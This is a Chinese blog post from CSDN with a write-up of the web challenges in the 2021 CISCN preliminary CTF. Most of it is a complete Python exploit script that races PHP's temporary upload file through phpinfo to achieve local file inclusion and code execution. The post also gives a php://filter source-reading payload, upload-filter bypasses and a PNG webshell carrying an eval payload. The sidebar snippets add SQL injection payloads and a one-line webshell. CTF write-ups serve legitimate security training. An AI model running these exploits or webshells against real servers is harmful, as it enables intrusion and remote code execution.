2021ciscn初赛web部分简单wp

最新推荐文章于 2024-06-10 18:26:28 发布
最新推荐文章于 2024-06-10 18:26:28 发布
阅读量432 收藏
点赞数 2
分类专栏: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45805993/article/details/117230381
版权

0x00. 简单的题不想写wp,难的题写不出来……这篇博客应该会比较水,不喜勿喷
0x01.easy_source
Payload

http://xxxxxxxxxx/index.php?rc=splFileobject&ra=.index.php.swo&ra=php://filter/read=convert.base64-encode/resource=index.php&rb=rb&rd=fgets

挺简单的,不细说了
用php原生类splFileObject,用gets或者toString方法读源码,只能读一行的情况可以用php-read那个伪协议,没想到flag就在源码里,算是意外收获吧
据说有原题,不懂的可以找找
0x02. middle_source
源码
扫后台扫出.listing
进去后发现一个路由,可以访问到phpinfo
审计源码,文件包含,可以选择包含的文件,执行php代码
结合源码想到post文件,通过phpinfo得到暂时文件名,然后条件竞争,在服务器删除暂时文件前访问到
当时参考的博客
https://blog.csdn.net/qq_21604717/article/details/52357778
https://github.com/vulhub/vulhub/blob/master/php/inclusion/exp.py
把网上的脚本改一下就能出exp了
脚本

#!/usr/bin/python
import sys
import threading
import socket


def setup(host, port):
    TAG = "Security Test"
    PAYLOAD = """%s\r
<?php var_dump(scandir("/etc/aacecdiefb/djdfcjdahd/bfcafbehje/adaacfaaad/hcadccffbc/"))?>\r""" % TAG
    REQ1_DATA = """-----------------------------7dbff1ded0714\r
Content-Disposition: form-data; name="dummyname"; filename="test.txt"\r
Content-Type: text/plain\r
\r
%s
-----------------------------7dbff1ded0714--\r""" % PAYLOAD
    padding = "A" * 5000
    REQ1 = """POST /you_can_seeeeeeee_me.php?a=""" + padding + """ HTTP/1.1\r
Cookie: PHPSESSID=q249llvfromc1or39t6tvnun42; othercookie=""" + padding + """\r
HTTP_ACCEPT: """ + padding + """\r
HTTP_USER_AGENT: """ + padding + """\r
HTTP_ACCEPT_LANGUAGE: """ + padding + """\r
HTTP_PRAGMA: """ + padding + """\r
Content-Type: multipart/form-data; boundary=---------------------------7dbff1ded0714\r
Content-Length: %s\r
Host: %s\r
\r
%s""" % (len(REQ1_DATA), host, REQ1_DATA)
    # modify this to suit the LFI script
    LFIREQ = """POST / HTTP/1.1\r
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0\r
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r
Content-Type: application/x-www-form-urlencoded\r
Content-Length: %d\r
Origin: http://124.71.233.158:24321\r
Connection: close\r
Referer: http://124.71.233.158:24321/\r
Upgrade-Insecure-Requests: 1\r
Host:%s\r
\r
cf=../../..%s\r
"""
    return (REQ1, TAG, LFIREQ)


def phpInfoLFI(host, port, phpinforeq, offset, lfireq, tag):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    s.connect((host, port))
    s2.connect((host, port))

    s.send(phpinforeq)
    d = ""
    while len(d) < offset:
        d += s.recv(offset)
    try:
        i = d.index("[tmp_name] =&gt; ")
        fn = d[i + 17:i + 31]
    except ValueError:
        return None
    s2.send(lfireq % (len(fn)+11,host,fn))
    d = s2.recv(4096)
    print(d)
    s.close()
    s2.close()
    print(fn)
    if d.find(tag) != -1:
        return fn


counter = 0


class ThreadWorker(threading.Thread):
    def __init__(self, e, l, m, *args):
        threading.Thread.__init__(self)
        self.event = e
        self.lock = l
        self.maxattempts = m
        self.args = args

    def run(self):
        global counter
        while not self.event.is_set():
            with self.lock:
                if counter >= self.maxattempts:
                    return
                counter += 1

            try:
                x = phpInfoLFI(*self.args)
                if self.event.is_set():
                    break
                if x:
                    print "\nGot it! Shell created in /tmp/g"
                    self.event.set()

            except socket.error:
                return


def getOffset(host, port, phpinforeq):
    """Gets offset of tmp_name in the php output"""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    s.send(phpinforeq)

    d = ""
    while True:
        i = s.recv(4096)
        d += i
        if i == "":
            break
        # detect the final chunk
        if i.endswith("0\r\n\r\n"):
            break
    s.close()
    i = d.find("[tmp_name] =&gt; ")
    if i == -1:
        raise ValueError("No php tmp_name in phpinfo output")

    print "found %s at %i" % (d[i:i + 10], i)
    # padded up a bit
    return i + 256


def main():
    print "LFI With PHPInfo()"
    print "-=" * 30

    if len(sys.argv) < 2:
        print "Usage: %s host [port] [threads]" % sys.argv[0]
        sys.exit(1)

    try:
        host = socket.gethostbyname(sys.argv[1])
    except socket.error, e:
        print "Error with hostname %s: %s" % (sys.argv[1], e)
        sys.exit(1)

    port = 80
    try:
        port = int(sys.argv[2])
    except IndexError:
        pass
    except ValueError, e:
        print "Error with port %d: %s" % (sys.argv[2], e)
        sys.exit(1)

    poolsz = 10
    try:
        poolsz = int(sys.argv[3])
    except IndexError:
        pass
    except ValueError, e:
        print "Error with poolsz %d: %s" % (sys.argv[3], e)
        sys.exit(1)

    print "Getting initial offset...",
    reqphp, tag, reqlfi = setup(host, port)
    offset = getOffset(host, port, reqphp)
    sys.stdout.flush()

    maxattempts = 1000
    e = threading.Event()
    l = threading.Lock()

    print "Spawning worker pool (%d)..." % poolsz
    sys.stdout.flush()

    tp = []
    for i in range(0, poolsz):
        tp.append(ThreadWorker(e, l, maxattempts, host, port, reqphp, offset, reqlfi, tag))

    for t in tp:
        t.start()
    try:
        while not e.wait(1):
            if e.is_set():
                break
            with l:
                sys.stdout.write("\r% 4d / % 4d" % (counter, maxattempts))
                sys.stdout.flush()
                if counter >= maxattempts:
                    break
        print
        if e.is_set():
            print "Woot!  \m/"
        else:
            print ":("
    except KeyboardInterrupt:
        print "\nTelling threads to shutdown..."
        e.set()

    print "Shuttin' down..."
    for t in tp:
        t.join()


if __name__ == "__main__":
    main()

0x03.upload
源码
第一关
参考P神博客
https://www.leavesongs.com/PENETRATION/when-imagemagick-meet-getimagesize.html
在文件后面加上
#define height 1
#define width 1
让getImagesize函数把它当作xbm文件,从而绕过宽高验证

第二关
用奇怪的拉丁文之类的unicode,通过大小写字符折叠漏洞,绕过.zip后缀的过滤
https://www.compart.com/en/unicode

第三关
脚本
https://github.com/huntergregal/PNG-IDAT-Payload-Generator
修改脚本的payload部分
https://gchq.github.io/CyberChef/
将payload改为<?=eval($__POST(1))?>,并修改编码后的部分
脚本生成图片马,修改为php后缀,压成zip上传,访问即可执行命令

ByNotD0g
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
[CISCN2021]初赛
Huamang的博客
05-16 1991
easy_sql 无列名和报错注入 uname=123&passwd=123') AND EXTRACTVALUE(1,CONCAT(0x5e,(select * from (select * from flag as a join flag as b using(no,id))x)))--+ 出了字段名1d004bae-a9e9-4f4e-8af1-c9518d464307 uname=qwe&passwd=') AND EXTRACTVALUE(1,CONCAT(0x5e,(sele
2021csp-j初赛试题及答案.docx
11-09
CSP-J初赛试题通常包括两部分:编程题和算法题。编程题主要考察选手对基本编程语言(如C++或Python)的理解和运用,包括变量、数据类型、控制结构、函数等基础知识;算法题则侧重于解决实际问题的能力,涉及搜索、...
WPCISCN2021初赛-WEB部分
車鈊的博客
06-06 780
WEB Easysql 模糊测试 发现columns,information,union(大小写)被过滤 报错回显点 UNION联合注入无法使用,测试登录发现报错点 回显位和库名 我们采用报错注入,用and做语法连接 // 测试列数 wyx123')and(select 1)# // 爆破库名 wyx123')and(select updatexml(1,concat(0x7e,database(),0x7e),1))# 列名的猜解-无列名注入 当我们构造连接查询,对其加上using限制(using:
第十七届全国大学生信息安全竞赛创新实践能力赛初赛CISCN-2024部分WP
Welcome To Myon'Blog !
05-20 2160
给的 e 其实就是 d,只是结果是移位后的输出,n 很大无法分解,但 kk 与 rr 很小,由 rr= e//n 即可推出 rr 和 kk,又由 e + x + kk*p + rr*((p+1)* (q+1))+ 1 = 65537,将 × 设为 0 和 2^200 然后联立求解一元二次方程,就能求出 p, q 的上下界,这样就有p 和q 的高位,枚举未知位尝试coppersmith 直到分解出结果,最后代入求 e 和 d,进而求得flag。
第15届全国大学生知识竞赛 2022ciscn初赛 部分wp
blowed的博客
05-31 1521
Misc ez_usb 1.键盘流量 USB协议数据部分在Leftover Capture Data域中,数据长度为八个字节。其中键盘击键信息集中在第三个字节中。 如图,发现击键信息为0x06,即对应的按键为C 2.鼠标流量 USB协议鼠标数据部分在Leftover Capture Data域中,数据长度为四个字节。 其中第一个字节代表按键,当取0x00时,代表没有按键、为0x01时,代表按左键,为0x02时,代表当前按键为右键。 第二个字节可以看成是一个signed byte类型,
2023ciscn_web部分wp
q1415500189的博客
06-28 235
上传到靶机上,这时候靶机上tmp目录下有一个名为feng的指向/var/www/html/的文件,如果再解压到feng文件夹下的话,就会自动接要到feng所指向的目录也就是/var/www/html/,这时,ps:题目不是说flag在/flag下么,我tm用system('cat /flag')半天抓不到flag,结果最后在phpinfo里面找到了。直接在flag1后面加上 -r "./test1.php" -w "<?使用软链接,先生成一个指向/var/www/html/的软链接文件夹feng,
2022 CISCN全国初赛-wp
qq_45603443的博客
05-30 1799
2022 CISCN全国初赛-wpWebEzpoponline_crtMiscez_usbCrypto签到基于挑战码的双向认证基于挑战码的双向认证2基于挑战码的双向认证3Pwnpwn1重点来了 Web Ezpop <?php namespace think{ abstract class Model{ private $lazySave = false; private $data = []; private $exists = false; protected $table; private $wi
CISCN2024 初赛 wp 部分复现(Re)
最新发布
Pisces50002的博客
06-10 856
成功率比较玄学,有的版本就不行,我用nexus5x真机也是会崩溃,这里是雷电9.0模拟的OPPO 9。字符串收集信息,可以猜测是利用seed生成randint、random之类的随机数进行了处理。密文长度是56,base64是3->4,转回来flag是42个字符(猜测)借助GPT对几个关键函数进行分析,忽略一些异常处理,看一下主要的逻辑。输入的内容base64编码之后,与通过randint生成的随机数异或。首先是unidbg的环境配置,这个特别麻烦,建议使用。讲的蛮好的,就是挺麻烦,基本功要求高。
2021 全国大学生信息安全竞赛ciscn web wp
midi
05-19 2030
2021 ciscn web wpupload 复现几道没做出来的题:> upload 发现文件index.php、example.php 知识点1:绕过getimagesize 在上传的文件最后面加上 #define width 1 #define height 1 知识点2:绕过zip字符中的i 结合 https://bugs.php.net/bug.php?id=77375 使用İ字符可以绕过i字符的匹配,如果php这三个字符也能绕过就能直接上传php了~~,官方中发现只能针对这几个字符
CISCN 2022 初赛 web 复现
shinygod的博客
11-17 1705
比赛复现
2021年西门子杯运动控制方向圆盘初赛程序
06-04
"2021年西门子杯运动控制方向圆盘初赛程序"这个标题揭示了几个关键信息。首先,这是与“西门子杯”竞赛相关的,这是一个年度性的工业自动化领域的竞赛,旨在提升学生的技能和创新意识。其次,比赛的方向是“运动控制...
2021-CSP-S-提高组初赛
08-24
2021-CSP-S-提高组初赛试题解析 本文将对 2021-CSP-S 提高组初赛试题进行详细解析,涵盖 Linux 系统、算法、数据结构、程序设计等多个领域。 单项选择题 1. 在 Linux 系统终端中,用于列出当前目录下所含的文件和...
NOIP普及组2007-2021初赛试题及答案.zip
10-08
通过对《NOIP2011-2021初赛普及组C++题目及参考答案》文档的分析,我们可以发现以下几个重要的知识点: 1. **基本语法**:包括变量声明、常量定义、运算符的使用、流程控制语句(if-else, switch-case, for, while...
2021csp-j初赛试题及答案.pdf
06-21
**程序阅读部分:** 这段C++代码中,函数`f(int x)`计算二进制表示中1的个数,而`g(int x)`找到x的最低位的1(右移并按位与操作)。`main()`函数读取整数n和n个整数数组元素,但没有显示如何使用这些函数或处理输入...
萌新之php一句话木马(上传漏洞)
热门推荐
weixin_45805993的博客
11-09 1万+
0x00参考文章 https://www.cnblogs.com/wangtanzhi/p/12243206.html https://xz.aliyun.com/t/2435 https://blog.csdn.net/momo_sleet/article/details/82497520 0x01 什么是一句话木马 <?php @eval($_POST['hacker']); ?> 如上就是一句一句话木马,eval函数可以使php将post进去的内容当做代码处理 如果网站在用户上传文件时没
thinkphp5.1.37 可以读写文件 利用phar反序列化
weixin_45805993的博客
11-29 935
安洵杯一道题…一开始根本没想到用phar…还是太菜了 tp版本5.1.37TLS 源码 <?php namespace app\index\controller; use think\Controller; class Index extends controller { public function index() { return '<style type="text/css">*{ padding: 0; margin: 0; } div{ pad
wmctf2021 Flag Thief && 祥云杯 层层取证 && 陇剑杯 wifi && 羊城杯 辣鸡取证
weixin_45805993的博客
09-18 744
0x00我是菜鸡 这题算是做过的取证题里很复杂的了,拿出来复现一下 大部分内容参考了套神的博客,先贴在上面 https://blog.csdn.net/qq_42880719/article/details/120000111 0x01题解 因为没有取证大师,我这里先选择了用FTK挂载镜像 Hint:曾远程过其他电脑 从大神的博客学到这里大概有几种思路 1.default.rdp文件 2.注册表搜索Terminal Server Client 3.BMC 与bin缓存文件,可缓存远程桌面图片,文件位置:%
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值